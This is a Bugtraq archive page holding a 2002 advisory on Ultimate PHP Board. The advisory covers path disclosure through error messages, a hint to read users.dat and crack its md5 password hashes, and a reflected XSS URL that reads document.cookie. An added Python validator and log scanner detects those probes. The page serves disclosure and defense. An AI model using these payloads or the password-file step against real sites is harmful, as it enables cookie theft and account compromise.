Bugtraq mailing list archives

Re: XSS and Path Disclosure in UPB


From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 09 Dec 2002 10:47:50 +0100



Everything about UPB was already written (1.1 & 1.0beta):
http://www.frogsecure.com/tutos/UPB.txt



From: "euronymous" <just-a-user () yandex ru>
Reply-To: just-a-user () yandex ru
To: bugtraq () securityfocus com, vulnwatch () vulnwatch org
Subject: XSS and Path Disclosure in UPB
Date: Sat, 7 Dec 2002 20:08:34 +0300 (MSK)

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in UPB
product: Ultimate PHP Board (UPB) final beta 1.0
vendor: http://www.webrc.ca/php/upb.php
risk: middle
date: 12/7/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/009.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------

1) when calling add.php, which comes with upb, it outputs an
error message that contains the following information:

================================================================
Warning: Failed opening 'textdb_v2.inc.php' for inclusion
(include_path='.:/usr/local/lib/php') in
/home/samcom/public_html/public/messageboard2/add.php on line 5
attempting to edit record...

Fatal error: Call to undefined function: format_field() in
/home/samcom/public_html/public/messageboard2/add.php on line 11
================================================================

as you can see, the script output contains the full physical path of the
board.

2) but if the user has deleted this file (add.php), you can view
the full path in this way:

==============================================================
http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
==============================================================

because the `id' parameter doesn't check whether the input data was entered
correctly, it outputs the following error message:

=========================== snip ==============================
Warning: Unable to access ./data_dir/some_shit.dat in
/home/samcom/public_html/public/messageboard2/textdb.inc.php on
line 240

..

Warning: Supplied argument is not a valid File-Handle resource
in /home/samcom/public_html/public/messageboard2/textdb.inc.php
on line 241

..
=========================== snip ==============================

where `data_dir' is the name of the directory where important files
are stored, e.g. users.dat with users' passwords (md5). by default the
name of this directory is `db'.

if the user doesn't make this dir secure, then you can get the users'
passwds by reading the file users.dat (default name.. but it is
old stuff) and cracking the md5 hashes.

3) because of the above, viewtopic.php doesn't check at all, so you
can insert some html in the script's output:

========================================================
http://hostname.com/phorum/viewtopic.php?id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
========================================================

[it must be in a single string]

a non-URL-encoded string works fine also.
ps. all of these issues apply to previous versions of upb.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all
russian security guyz!! and kate for she is kewl girl ))
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================
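Defender-side checks for the viewtopic.php `id' issue described in the advisory above, added here as an example (not UPB code and not the advisory author's): a validator modelling the obvious fix, and a scan over constructed access-log lines that flags the two probes the post shows. The digits-only topic-id format, the `SAMPLE_LOG` entries and the log layout are assumptions.

```python
"""Defensive checks for the viewtopic.php `id' parameter from the advisory.
Added example, not UPB code: the post does not give the real topic-id
format, so digits-only is an assumption; the log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

TOPIC_ID_RE = re.compile(r"^[0-9]{1,10}$")   # assumed legitimate form (cf. t_id=2)
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+" \d{3}')  # request line

# Constructed sample access log: a normal request, the two probes from the
# advisory (path disclosure via a bogus id, then the XSS id), an unrelated page.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Dec/2002:20:01:10 +0300] "GET /phorum/viewtopic.php?id=15&t_id=2 HTTP/1.0" 200 4321',
    '10.0.0.9 - - [07/Dec/2002:20:02:44 +0300] "GET /phorum/viewtopic.php?id=some_shit&t_id=2 HTTP/1.0" 200 1890',
    '10.0.0.9 - - [07/Dec/2002:20:03:01 +0300] "GET /phorum/viewtopic.php?id=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2 HTTP/1.0" 200 1990',
    '10.0.0.7 - - [07/Dec/2002:20:04:00 +0300] "GET /phorum/index.php HTTP/1.0" 200 5000',
]

def safe_topic_id(raw):
    """Return the id as an int when well-formed, else None.  Digits only means the
    value can neither name an arbitrary './data_dir/<id>.dat' nor carry HTML."""
    if raw is None or not TOPIC_ID_RE.match(raw):
        return None
    return int(raw)

def classify_id(raw):
    """Why an id value is suspicious, or None when it is acceptable."""
    if safe_topic_id(raw) is not None:
        return None
    if re.search(r"<[a-z!/]", raw, re.I):
        return "xss-probe"        # HTML tag that viewtopic.php would reflect
    return "malformed-id"         # e.g. id=some_shit, which leaks the path

def flag_viewtopic_requests(log_lines):
    """Return (line_no, decoded_id, reason) for viewtopic.php requests whose `id'
    would trip the textdb warnings or reflect HTML; parse_qs percent-decodes,
    so encoded and plain probes are caught alike."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/viewtopic.php"):
            continue
        raw_id = parse_qs(url.query, keep_blank_values=True).get("id", [None])[0]
        reason = classify_id(raw_id) if raw_id is not None else None
        if reason:
            hits.append((n, raw_id, reason))
    return hits
```

Running `flag_viewtopic_requests(SAMPLE_LOG)` reports only the second and third lines; a real fix in the board would additionally turn off `display_errors` in production so the warnings stop leaking the install path.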

